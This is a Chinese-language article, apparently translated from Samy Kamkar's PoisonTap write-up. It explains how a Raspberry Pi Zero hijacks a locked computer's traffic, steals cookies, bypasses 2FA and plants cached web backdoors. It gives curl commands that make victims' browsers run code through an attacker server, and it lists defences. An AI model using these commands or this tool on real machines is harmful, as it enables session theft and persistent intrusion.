怎么入侵一個(gè)鎖屏的電腦，Raspberry Pi Zero就可以

當(dāng)poison Tap插入被鎖定/密碼保護(hù)的電腦時(shí)：

• 模擬以太設(shè)備通過USB
• 從機(jī)器劫持所有上網(wǎng)流量（盡管是一個(gè)低級優(yōu)先級/未知的網(wǎng)絡(luò)接口）
• 存儲(chǔ)Alexa排名top 1000000 的網(wǎng)站的http cookies 和sessions
• 暴露內(nèi)部路由器給攻擊者，使攻擊者可以訪問遠(yuǎn)程WebSocket并且重新綁定DNS（感謝馬特·奧斯汀DNS重新綁定的想法?。?/li>
• 安裝在HTTP緩存持久基于Web的后門為成千上萬個(gè)域名和常見的JavaScript CDN的URL，都通過緩存中毒訪問用戶的cookie
• 允許攻擊者在任何后門域中可以遠(yuǎn)程強(qiáng)制使用用戶的cookie進(jìn)行HTTP請求和代理回應(yīng)響應(yīng)（GET＆POST）
• 不需要機(jī)器解鎖
• 即使設(shè)備被刪除偷走，后門訪問仍然繼續(xù)

詳細(xì)的視頻介紹：

[embed]http://v.youku.com/v_show/id_XMTgyMjc3NDU2OA==.html[/embed]

poison Tap 繞過以下安全機(jī)制：

• 密碼保護(hù)與屏幕鎖定
• 路由表優(yōu)先級和和網(wǎng)絡(luò)接口循序
• 同源策略
• X-Frame-Options
• HttpOnly Cookies
• SameSite cookie的屬性
• 雙因素/多因素驗(yàn)證（2FA / MFA）
• DNS綁定
• 跨域資源共享(CORS）
• 當(dāng)安全標(biāo)記cookie和HSTS未啟用時(shí)進(jìn)行HTTPS cookie 保護(hù)

PoisonTap

PoisonTap是由 價(jià)值5$的Raspberry Pi Zero構(gòu)建的，除了微型USB電纜和microSD卡之外不需要任何其它額外組件，但PoisonTap可以在其它可以模擬USB小部件（如USB Armory和LAN Turtle）的設(shè)備上工作。

 

(incredible HTML5 canvas animation by Ara) Video Demo: https://youtu.be/Aatp5gCskvk Point of Contact: @SamyKamkar // https://samy.pl Released: November 16, 2016 Source code and download: https://github.com/samyk/poisontapHow PoisonTap Works

PoisonTap通過利用機(jī)器和網(wǎng)絡(luò)的各種機(jī)制（包括USB / Thunderbolt，DHCP，DNS和HTTP）中現(xiàn)有的信任來產(chǎn)生級聯(lián)效應(yīng)，從而產(chǎn)生信息滲透，網(wǎng)絡(luò)訪問和半永久后門的安裝的雪球效應(yīng)。

 

簡而言之，PoisonTap執(zhí)行以下操作：

網(wǎng)絡(luò)攻擊

1.網(wǎng)絡(luò)劫持攻擊者將PoisonTap（例如武裝強(qiáng)化的Raspberry Pi Zero）插入鎖定的計(jì)算機(jī)（即使計(jì)算機(jī)受密碼保護(hù)） 2.PoisonTap模擬以太網(wǎng)設(shè)備（例如，USB / Thunderbolt） - 默認(rèn)情況下，Windows，OS X和Linux識(shí)別以太網(wǎng)設(shè)備，自動(dòng)將其作為低優(yōu)先級網(wǎng)絡(luò)設(shè)備加載并在其上執(zhí)行DHCP請求，即使機(jī)器被鎖定或密碼保護(hù) 3.PoisonTap響應(yīng)DHCP請求并為機(jī)器提供IP地址，但是DHCP響應(yīng)的目的是告訴機(jī)器整個(gè)IPv4空間（0.0.0.0 - 255.255.255.255）是PoisonTap本地網(wǎng)絡(luò)的一部分，而不是子網(wǎng)（如192.168.0.0 - 192.168.0.255）

• 通常，如果次要網(wǎng)絡(luò)設(shè)備連接到機(jī)器，因?yàn)樗鼘⒈唤o予比現(xiàn)有（受信任）網(wǎng)絡(luò)設(shè)備更低的優(yōu)先級，并且不會(huì)取代用于因特網(wǎng)業(yè)務(wù)的網(wǎng)關(guān)，但是...
• 任何路由表/網(wǎng)關(guān)優(yōu)先級/網(wǎng)絡(luò)接口服務(wù)順序安全性由于“LAN流量”優(yōu)先級超過“Internet流量”而被繞過
• PoisonTap利用此網(wǎng)絡(luò)訪問，甚至作為低優(yōu)先級網(wǎng)絡(luò)設(shè)備，因?yàn)榈蛢?yōu)先級網(wǎng)絡(luò)設(shè)備的子網(wǎng)被給予比最高優(yōu)先級網(wǎng)絡(luò)設(shè)備的網(wǎng)關(guān)（默認(rèn)路由）更高的優(yōu)先級
• 這意味著如果流量為1.2.3.4，而通常此流量將擊中主網(wǎng)絡(luò)設(shè)備（非PoisonTap）的默認(rèn)路由/網(wǎng)關(guān)，PoisonTap實(shí)際上獲取流量，因?yàn)镻oisonTap“本地”網(wǎng)絡(luò)/子網(wǎng)包含1.2 .3.4，以及每個(gè)其它IP地址存在;）
• 因此，即使機(jī)器連接到具有較高優(yōu)先級和正確網(wǎng)關(guān)（真正的WiFi，以太網(wǎng)等）的另一個(gè)網(wǎng)絡(luò)設(shè)備，所有的Internet流量也會(huì)經(jīng)過PoisonTap

 

抓取Cookie

1.只要Web瀏覽器正在運(yùn)行后臺(tái)，每打開一個(gè)頁面，服務(wù)器后臺(tái)都要進(jìn)行http請求（例如加載新廣告，將數(shù)據(jù)發(fā)送到分析平臺(tái)，或者只是繼續(xù)跟蹤您的網(wǎng)絡(luò)運(yùn)動(dòng)）

• 你可以驗(yàn)證這一點(diǎn)，通過進(jìn)入devtools / inspector（通常是Cmd + Shift + I或Ctrl + Shift + I），然后點(diǎn)擊一個(gè)訪問量很大的網(wǎng)站，點(diǎn)擊網(wǎng)絡(luò)選項(xiàng)卡，并觀察作為遠(yuǎn)程資源繼續(xù)訪問，即使你在頁面上沒有采取任何操作。

2.根據(jù)此HTTP請求，由于所有流量都退出到PoisonTap設(shè)備，PoisonTap DNS欺騙即時(shí)返回其自己的地址，導(dǎo)致HTTP請求命中PoisonTap Web服務(wù)器（Node.js）

• 如果DNS服務(wù)器指向PoisonTap無法獲得特權(quán)的內(nèi)部IP（LAN），攻擊繼續(xù)有效，因?yàn)閮?nèi)部DNS服務(wù)器將為受攻擊的各個(gè)域產(chǎn)生公共IP地址，并且它是PoisonTap的公共IP地址已經(jīng)劫持
• 一旦內(nèi)部DNS服務(wù)器響應(yīng)，Web瀏覽器將訪問公共IP，最終在任一情況下訪問PoisonTap Web服務(wù)器（Node.js）

3.當(dāng)Node web服務(wù)器接收到請求時(shí)，PoisonTap會(huì)響應(yīng)一個(gè)可以解釋為HTML或Javascript的響應(yīng)，這兩個(gè)都正確執(zhí)行（許多網(wǎng)站將在后臺(tái)請求中加載HTML或JS） 4.然后，HTML / JS-agnostic頁面會(huì)生成許多隱藏的iframe，每個(gè)iframe跨越不同的Alexa-top-100萬個(gè)域

• 域上的任何“X-Frame-Options”安全性都被繞過，因?yàn)镻oisonTap現(xiàn)在是HTTP服務(wù)器，并選擇發(fā)送到客戶端的標(biāo)頭
• 隨著對網(wǎng)站的每個(gè)iframe HTTP請求（例如，http://nfl.com/PoisonTap），HTTP cookie從瀏覽器發(fā)送到PoisonTap劫持的“公共IP”，其迅速記錄cookie /驗(yàn)證信息，將成千上萬的用戶的Cookie記錄到PoisonTap
• 任何“HttpOnly”cookie安全性被繞過，并且捕獲這些cookie是因?yàn)闆]有Javascript在域本身上執(zhí)行，而是僅用于首先加載iframe
• 任何跨源資源共享或同源策略安全性被繞過，因?yàn)檎谠L問的域?qū)g覽器顯示合法
• 由于我們捕獲的是Cookie而不是憑據(jù)，因此當(dāng)攻擊者使用Cookie登錄時(shí)，將繞過在網(wǎng)站上實(shí)施的任何2FA / MFA。這是因?yàn)槲覀儗?shí)際上不是執(zhí)行登錄功能，而是繼續(xù)一個(gè)已經(jīng)登錄的會(huì)話，不會(huì)觸發(fā)雙因素身份驗(yàn)證
• 如果服務(wù)器使用HTTPS，但Cookie未顯式設(shè)置安全cookie標(biāo)志，則繞過HTTPS保護(hù)，并將cookie發(fā)送到PoisonTap

 

基于web后門的遠(yuǎn)程訪問

1.雖然PoisonTap正在生產(chǎn)數(shù)千個(gè)iframe，迫使瀏覽器加載每個(gè)iframe，但這些iframe不僅僅是空白頁面，而是無限緩存的HTML + Javascript后門 2.即使用戶當(dāng)前未登錄，由于PoisonTap在每個(gè)域上強(qiáng)制緩存這些后門，后門被綁定到該域，使攻擊者能夠使用域的Cookie并在將來啟動(dòng)同源請求，即使用戶當(dāng)前未登錄

• 例如，當(dāng)加載http://nfl.com/PoisonTap iframe時(shí)，PoisonTap通過Node Web服務(wù)器響應(yīng)HTTP請求接受轉(zhuǎn)向的Internet流量。
• 添加了其它HTTP頭以無限緩存頁面

3.頁面的實(shí)際響應(yīng)是HTML和Javascript的組合，其產(chǎn)生持續(xù)的WebSocket到攻擊者的web服務(wù)器（通過因特網(wǎng)，而不是PoisonTap設(shè)備）

• WebSocket保持打開狀態(tài)，允許攻擊者在將來的任何時(shí)候連接回后端機(jī)器，并在任何有后門實(shí)現(xiàn)的源上執(zhí)行請求（Alexa排名前100萬個(gè)網(wǎng)站 - 見下文）
• 如果后門在一個(gè)站點(diǎn)（例如，nfl.com）上打開，但用戶希望攻擊不同的域（例如，pinterest.com），攻擊者可以將nfl.com上的iframe加載到pinterest.com后門（http://pinterest.com/PoisonTap）。
• 同樣，域上的任何“X框架選項(xiàng)”，跨源資源共享和同源策略安全性完全被繞過，因?yàn)檎埱髮⒚蠵oisonTap離開的緩存，而不是真正的域

[caption id="attachment_92146" align="aligncenter" width="628"]

 

OLYMPUS DIGITAL CAMERA[/caption]

內(nèi)部路由器后門和遠(yuǎn)程訪問

1.PoisonTap不能劫持是真正的網(wǎng)絡(luò)接口的實(shí)際LAN子網(wǎng)（例如，如果用戶的wifi子網(wǎng)是192.168.0.x，這個(gè)網(wǎng)絡(luò)不受影響），但... 2.PoisonTap在一個(gè)特別主機(jī)上強(qiáng)制緩存后門，具體地，目標(biāo)路由器的IP后面加上“.ip.samy.pl”，例如。 192.168.0.1.ip.samy.pl，基本上產(chǎn)生持久的DNS重綁定攻擊

• 當(dāng)使用PoisonTap作為DNS服務(wù)器（受害者使用公共DNS服務(wù)器）時(shí)，PoisonTap臨時(shí)使用專門的PoisonTap IP（1.0.0.1）進(jìn)行響應(yīng)，這意味著此時(shí)的任何請求都將命中PoisonTap Web服務(wù)器
• 如果期待DNS服務(wù)器設(shè)置內(nèi)部網(wǎng)絡(luò)（例如，192.168.0.x），我們對1.0.0.1.pin.ip.samy.pl服務(wù)器發(fā)出一個(gè)額外的特制請求，幾秒之后，它會(huì)返回專用DNS服務(wù)器（公網(wǎng)的）的信息。
• 然后，PoisonTap在http://192.168.0.1.ip.samy.pl/PoisonTap上快速設(shè)置一個(gè)后門，暫時(shí)指向1.0.0.1版本的PoisonTap設(shè)備，它允許后門從PoisonTap設(shè)備訪問和存儲(chǔ)

3.DNS綁定和DNS重綁的安全性由于耗盡DNS綁定表而被繞過。由于之前做出的成千上萬次的請求，DNS不需要重新綁定，使得該攻擊可以持續(xù)很長時(shí)間（感謝Matt Austin分享這種攻擊思路?。?4.現(xiàn)在,后門強(qiáng)制連接到http://192.168.0.1.ip.samy.pl/PoisonTap，任何對192.168.0.1.ip.samy.pl的請求都將命中非固定的IP地址，導(dǎo)致192.168.0.1 以解析，直接指向路由器 5.這意味著如果通過后門遠(yuǎn)程在iframe中加載192.168.0.1.ip.samy.pl/PoisonTap主機(jī)，你可以對內(nèi)部路由器上的任何其他頁面執(zhí)行AJAX GET / POST，完全遠(yuǎn)程，從而允許遠(yuǎn)程訪問內(nèi)部路由器

• 這可能導(dǎo)致對路由器的其它攻擊，攻擊者可能從來沒有訪問過，例如路由器上的默認(rèn)管理員憑據(jù)用于覆蓋DNS服務(wù)器或暴露的其他身份驗(yàn)證漏洞

 

Recap of the DNS server:

[ip.addy].ip.samy.pl normally responds with [ip.addy]
192.168.0.1.ip.samy.pl -> 192.168.0.1 (A record)
[ip.addy].pin.ip.samy.pl temporarily (~5 seconds) points *.ip.samy.pl to [ip.addy]
1.0.0.1.pin.ip.samy.pl -> 1.0.0.1
192.168.0.1.ip.samy.pl -> 1.0.0.1 (A record, short TTL)
(after ~5 seconds)
192.168.0.1.ip.samy.pl -> 192.168.0.1 (A record)

基于web遠(yuǎn)程訪問的其它后門

1.此外，PoisonTap替代了成千上萬的常見的，基于CDN的Javascript文件，如谷歌和jQuery CDNs。在確定安全的代碼加上一個(gè)后門，可以讓攻擊者訪問任何域時(shí)加載受感染的基于CDN的Javascript文件 2.由于每個(gè)域上都留有后門，即使當(dāng)前受害者沒有對當(dāng)前域任何開放任何窗口，攻擊者幾乎可以遠(yuǎn)程強(qiáng)制后端瀏覽器在任何主域上執(zhí)行同源請求（AJAX GET / POST） 3.當(dāng)受害者訪問網(wǎng)站時(shí)，后門現(xiàn)在可以在任何額外的網(wǎng)站上使用這些受感染的，基于HTTP的CDN Javascript框架

 

安全預(yù)防posion Tap

服務(wù)端安全

如果你正在運(yùn)行一個(gè)web服務(wù)器，以下是安全防御posion Tap的樣例： 1.僅使用HTTPS，至少為認(rèn)證和已認(rèn)證的內(nèi)容使用HTTPS 2.老實(shí)說，你應(yīng)該單獨(dú)使用HTTPS，并始終將HTTP內(nèi)容重定向到HTTPS，防止用戶通過HTTP提交被欺騙提供的憑據(jù)或其它PII 3.確保在Cookie上啟用安全標(biāo)記，防止通過HTTP泄漏HTTPS Cookie 4.使用HSTS防止HTTPS降級攻擊

桌面安全

1.拿粘合劑封住USB和Thunderbolt端口效果不錯(cuò)（與第3條類似，不過這里是物理封鎖---小編注） 2.每次離開機(jī)器時(shí)關(guān)閉瀏覽器，不過這是完全不切實(shí)際的 3.禁用USB / Thunderbolt端口也是有效的，雖然也不切實(shí)際 4.鎖定計(jì)算機(jī)沒有任何效果，因?yàn)榫W(wǎng)絡(luò)和USB堆棧在機(jī)器鎖定期間操作。但是，計(jì)算機(jī)進(jìn)入加密睡眠模式（例如，F(xiàn)ileVault2 +深度睡眠）可以解決大多數(shù)問題，因?yàn)閮?nèi)存需要內(nèi)存需要秘鑰解密，即使你的瀏覽器被喚醒。它仍然不能提出任何請求。

Code下載地址：

Source code: https://github.com/samyk/poisontap文件分解

在poisontap中有許多文件，它們用于不同的方面。 以下是文件列表：

• ackdoor.html：每當(dāng)一個(gè)http://hostname/PoisonTap URL命中exfiltrate cookies，這個(gè)文件是作為強(qiáng)制緩存的內(nèi)容返回。它包含一個(gè)后門，生成一個(gè)出站websocket到samy.pl:1337（可調(diào)整到任何主機(jī)/端口），保持打開等待服務(wù)器的命令。當(dāng)你在網(wǎng)站上加載iframe（如http://hostname/PoisonTap）時(shí)，這意味著這是被填充的內(nèi)容（即使PoisonTap從計(jì)算機(jī)中刪除）。
• backend_server.js ：這是你在Internet可訪問的服務(wù)器上運(yùn)行的Node.js服務(wù)器。 這是正是backdoor.html連接的內(nèi)容（例如，samy.pl:1337）。 這是你連接到發(fā)送命令到你的PoisonTapped minion機(jī)器相同的服務(wù)器，例如

# pop alert to victim
curl 'http://samy.pl:1337/exec?alert("muahahahaha")'
# to set a cookie on victim
curl 'http://samy.pl:1337/exec?document.cookie="key=value"'
# to force victim to load a url via ajax (note, jQuery is stored inside the backdoor)
curl 'http://samy.pl:1337/exec?$.get("http://192.168.0.1.ip.samy.pl/login",function(d)\{console.log(d)\})'

• pi_poisontap.js：它通過Raspberry Pi Zero上的Node.js運(yùn)行，是PoisonTap是負(fù)責(zé)截獲的來自HTTP服務(wù)器的任何請求的，是存儲(chǔ)Cookie和注入緩存的后門。
• pi_startup.sh：它在Raspberry Pi Zero上啟動(dòng)時(shí)運(yùn)行，以便將設(shè)備設(shè)置為模擬USB以太網(wǎng)小配件，為我們設(shè)置惡意DHCP服務(wù)器，允許流量重走，DNS欺騙，并啟動(dòng)上面的pi_poisontap.js。
• target_backdoor.js： 此文件預(yù)先放在任何與CDN相關(guān)的Javascript文件中，從而將其封鎖。
• target_injected_xhtmljs.html：這是在受害者的機(jī)器上注入無意/后臺(tái)HTTP / AJAX請求并產(chǎn)生整個(gè)攻擊的代碼。它的構(gòu)造方式使得它可以解釋為HTML或Javascript，并且仍然執(zhí)行相同的代碼。
• poisontap.cookies.log： 一旦用戶的計(jì)算機(jī)開始向PoisonTap發(fā)送HTTP請求，并且記錄來自瀏覽器的cookie及其所屬的相關(guān)URL /域，就會(huì)生成此文件。